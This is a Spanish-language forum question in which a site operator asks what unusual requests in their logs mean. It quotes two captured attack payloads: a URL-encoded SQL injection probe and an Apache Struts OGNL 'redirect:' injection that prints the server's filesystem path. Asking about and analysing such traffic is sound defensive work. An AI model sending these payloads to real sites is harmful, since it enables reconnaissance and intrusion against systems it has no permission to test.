Recientemente he visto algunas solicitudes extrañas en nuestro sitio, me pregunto qué podrían ser.
Normalmente obtenemos intentos de inyección de sql como este:
1111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CH
Aunque no soy un experto, entiendo vagamente la esencia de lo que está sucediendo allí.
Pero recientemente comencé a notar algunos como este:
redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().g'etRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
Nunca he visto algo así antes. Lo busqué en Google y parece que estaba relacionado con los puntales de Apache, pero no entendí completamente la mayoría de los resultados (ver foto abajo).
No estoy muy seguro de las etiquetas para esta pregunta; si se pueden mejorar, hágalo. Gracias.
